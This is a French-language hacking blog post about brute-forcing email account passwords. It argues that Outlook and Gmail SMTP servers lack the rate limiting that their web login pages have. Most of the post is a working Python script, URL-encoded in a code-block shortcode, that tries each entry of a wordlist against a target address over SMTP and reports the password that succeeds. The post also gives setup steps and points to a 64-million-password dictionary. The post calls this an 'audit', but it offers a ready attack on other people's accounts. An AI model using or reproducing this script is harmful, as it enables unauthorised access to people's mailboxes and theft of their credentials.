Dyrk.org
Do You Really Know

 

 

 

Salut les z’amis !

Bon Weekend à vous !
Ici nous allons parler de brute !
Vous m’avez bien entendu, souvenez-vous du grand gaillard bien bâti qui vous piquait toutes les nanas et vous volait en plus vos carambars à la récré …

 

 

Eh bien nous allons observer un moment de silence …
Car une technique de Hacking, ressemble plus ou moins à de ce genre de personnage … le « brute force » …  et nous allons l’étudier aujourd’hui dans cet article

Une technique qui consiste à secouer un système en lui envoyant pleins de mot de passe dans la tronche, jusqu’à ce que celui-ci aquiesce gentiment lorsqu’il reçoit le bon …

 

Bref, ce sont mes copains d’Aston Ecole qui m’ont inspiré cet article.
Car Nathan, l’heureux gagnant du concours organisé par Lock*****, a publié une vidéo sur Youtube de ces exploits en python …
Démontrant ainsi qu’il était possible de brute forcer un compte Gmail !

Aussi, j’ai vu ça … et dans ma tête ça a été ça …

 

 

 

Bref, en gros j’ai percuté sur un truc tout con …
Lorsque l’on s’essaie à faire du brute force sur des formulaires de connexion …
Les diverses messageries Outlook, Gmail, Yahoo, … se montrent très peu réceptives…
Elles finissent carrément par nous chasser à coup de captcha, voir nous bannir ..

 

Mais lorsque l’on s’attaque en brute force, directement au serveur smtp …
Biiim ! il n’y a aucun contrôle!
C’est OPEN BAR … pas de sécurité type fail2ban …

21 ème siècle !

 

C’est tout simplement hallucinant …

Bref, j’ai voulu vous partager un petit bout de script fonctionnel, que j’ai rédigé, pour m’assurer que ça n’était pas du flan …
Et bien non … ça n’en n’est pas …
Nous sommes au 21 ème siècles, et des grosses boites comme Google, se sécurisent à hauteur de 50%  contre ce genre d’attaque du moyen age …

 

[pastacode lang= »python » message= » » highlight= » » provider= »manual » manual= »%23!%2Fusr%2Fbin%2Fpython%0A%23%20Dyrk.org%202016-2017%0A%0Aimport%20smtplib%0A%0A%23%20Outlook.com%0Asmtp_s%20%20%20%3D%20’smtp-mail.outlook.com’%0A%0A%23%20Gmail%0A%23%20smtp_s%20%3D%20’smtp.gmail.com’%0A%0Asmtp_p%20%3D%20587%0Asender%20%3D%20’target_adress%40hotmail.com’%0Adico%20%20%20%3D%20’pwdlist.txt’%0A%0Awith%20open(dico)%20as%20f%3A%0A%20%20%20%20for%20password%20in%20f%3A%0A%20%20%20%20%20%20%20%20password%20%3D%20password.replace(‘%5Cn’%2C%20 »)%0A%20%20%20%20%20%20%20%20try%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20m%20%3D%20smtplib.SMTP(smtp_s%2C%20smtp_p)%0A%20%20%20%20%20%20%20%20%20%20%20%20m.ehlo()%0A%20%20%20%20%20%20%20%20%20%20%20%20m.starttls()%0A%20%20%20%20%20%20%20%20%20%20%20%20m.login(sender%2C%20password)%0A%20%20%20%20%20%20%20%20%20%20%20%20print%20’%5BOK%5D%20%3D%3E%20’%20%2B%20sender%20%2B%20’%20%3A%20’%20%2B%20password%0A%20%20%20%20%20%20%20%20%20%20%20%20m.close()%0A%20%20%20%20%20%20%20%20%20%20%20%20exit()%0A%20%20%20%20%20%20%20%20except%20smtplib.SMTPAuthenticationError%2C%20e%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20e%5B0%5D%20%3D%3D%20534%3A%20%20%23%20Gmail%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20print%20’%5BOK%5D%20%3D%3E%20’%20%2B%20sender%20%2B%20’%20%3A%20’%20%2B%20password%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20print%20e%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20exit()%0A%20%20%20%20%20%20%20%20%20%20%20%20else%3A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20print%20’try%20’%20%2B%20password%20%2B%20’%20….%20err.%20’%20%2B%20str(e%5B0%5D)%20%5C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2B%20’%20%20%20%3E%3E%3E%20%20’%20%2B%20e%5B1%5D%0A%0A%09%09%09″/]

 

Voilà, avec ça …
Vous pourrez en :

• configurant une adresse email cible
• renseignant une configuration smtp correspondante à l’adresse cible
• spécifiant un fichier dictionnaire contenant un mot de passe ligne par ligne …

Parvenir à auditer la sécurité d’une adresse email …

 

Vous trouverez sur cette page, un dictionnaire de 64 millions de mots de passe